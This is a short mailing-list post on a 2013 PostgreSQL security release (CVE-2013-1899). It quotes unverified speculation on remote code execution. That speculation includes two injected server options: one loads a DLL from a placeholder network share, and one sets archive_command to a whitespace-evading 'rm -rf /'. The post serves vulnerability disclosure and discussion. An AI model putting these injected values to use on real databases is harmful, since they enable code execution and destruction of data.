Re: PostgreSQL security update

[Solar Designer <solar () openwall com>]

On Thu, Apr 04, 2013 at 06:39:31PM +0400, Solar Designer wrote:
> A heads-up in case someone missed today's news:
>
> http://www.postgresql.org/about/news/1456/
> http://www.postgresql.org/support/security/faq/2013-04-04/

HD Moore's quick tweets on possible exploitability of CVE-2013-1899 into
remote code execution (beyond the attack vectors mentioned in
"2013-04-04 Security Release FAQ" above):

<@hdmoore> @quine exploitation seems tricky, I wonder if -c shared_preload_libraries=\\unc\share\blah.dll is doable
<@hdmoore> @quine Another options appears to be something like: -c archive_command=rm${IFS}-rf${IFS}/

Indeed, these have not been verified yet and they might not be doable.

Alexander